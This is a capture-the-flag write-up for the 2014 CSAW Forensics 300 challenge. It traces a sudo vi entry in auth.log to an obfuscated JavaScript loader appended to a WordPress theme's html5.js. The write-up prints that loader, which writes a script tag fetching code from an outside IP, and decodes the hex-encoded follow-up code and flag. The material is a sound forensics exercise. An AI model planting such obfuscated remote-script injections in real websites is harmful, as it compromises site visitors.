2014 CSAW Qualifying CTF - Forensics 300

Written by: Justin G.

To start off, this challenge was extremely fun, but it seems very intimidating when you first start, because you have no idea what to look for. Here's how I solved this challenge.
When CSAW2014-FluffyNoMore-v0.1.tar.bz2 is unpacked it contains 3 other .tar.bz2 files and 1 .bz2 file.

When those files got unpacked you are left with the following directories and files.

My first though was to look for any strange files, especially any that were recently modified. That didn't really lead anywhere significant. So my next logical step was too look at the logs. I first opened the apache logs, however there was so much data there I didn't really spend a lot of time looking for anything. I then opened up the auth.log which contains system authentication logs. There seems to be a lot of commands that look fairly normal, then I saw this one that seemed to stick out from all of the others.

Sep 17 19:20:09 ubuntu sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu/CSAW2014-WordPress/var/www ; USER=root ; 
COMMAND=/usr/bin/vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js
						
This was the only vi command that was run. So lets go take a look at that file.

At the bottom of the file that was opened with vi was the following JavaScript code, I even went and looked at the /themes/twentyfourteen/js/html5.js and /themes/twentytwelve/js/html5.js files too make sure it wasn't part of the theme.

var g = "ti";
var c = "HTML Tags";
var f = ". li colgroup br src datalist script option .";
f = f.split(" ");
c = "";
k = "/";
m = f[6];
for (var i = 0; i < f.length; i++) {
    c += f[i].length.toString();
}
v = f[0];
x = "\'ht";
b = f[4];
f = 2541 * 6 - 35 + 46 + 12 - 15269;
c += f.toString();
f = (56 + 31 + 68 * 65 + 41 - 548) / 4000 - 1;
c += f.toString();
f = "";
c = c.split("");
var w = 0;
u = "s";
for (var i = 0; i < c.length; i++) {
    if (((i == 3 || i == 6) && w != 2) || ((i == 8) && w == 2)) {
        f += String.fromCharCode(46);
        w++;
    }
    f += c[i];
}
i = k + "anal";
document.write("<" + m + " " + b + "=" + x + "tp:" + k + k + f + i + "y" + g + "c" + u + v + "j" + u + "\'>\");
						
The code looks to be a very interesting attempt at obfuscating JavaScript. The very last line is the one I wanted to focus on, because it is the only part of the code that actually outputs anything. Now, there are two ways to move from here, a safe way and a dirty way. I decided on the dirty way (I'll include what I should of done at the bottom of the write-up). I ran the code in Chrome's JavaScript console it sent me to http://128.238.66.100/announcement.pdf (Don't worry it's not malicious).
Screenshot of PDF:

I downloaded the PDF and opened it up with Adobe Reader and saw that the pdf had a file attached to it. However, adobe was being all safe and secure and it didn't allow me to open or save it.

I was working along with John H. and he pointed me in the direction of this program called pdftoolbox who's main purpose was to extract PDF attachments. I finally extracted the file and was able to cat it's contents.

File Contents:

var _0xee0b=["\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69
\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79
\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D"];var y=_0xee0b[0];
						
With a little hex to text conversion I was able to get:
YOU DID IT! CONGRATS! fwiw, JavaScript obfuscation is sofa king dumb :) key{Those Fluffy Bunnies Make Tummy Bumpy}

key{Those Fluffy Bunnies Make Tummy Bumpy}



The Safe Way

So the "correct" way of decoding the JavaScript follows.
So if I were to run the code in Chrome's JavaScript console I would have no idea what would happen. So, I changed document.write to console.log and ran the code. It outputted <script src='http://128.238.66.100/analytics.js'></script>. After grabbing that file and analyzing it I noticed an interesting two lines stuck in the middle of the file in between the functions.

var _0x91fe = ["\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66",
"\x5F\x73\x65\x6C\x66", "\x6F\x70\x65\x6E"];
window[_0x91fe[2]](_0x91fe[0], _0x91fe[1]);
						
After decofing the hex those lines turn into:
var _0x91fe = ["http://128.238.66.100/announcement.pdf", "_self", "open"];
window[_0x91fe[2]](_0x91fe[0], _0x91fe[1]);
						
You can see that it just opens the pdf location, so it's nothing harmful but it could of been. Better safe than sorry, I probably should listen to my own advise.

TALK TO US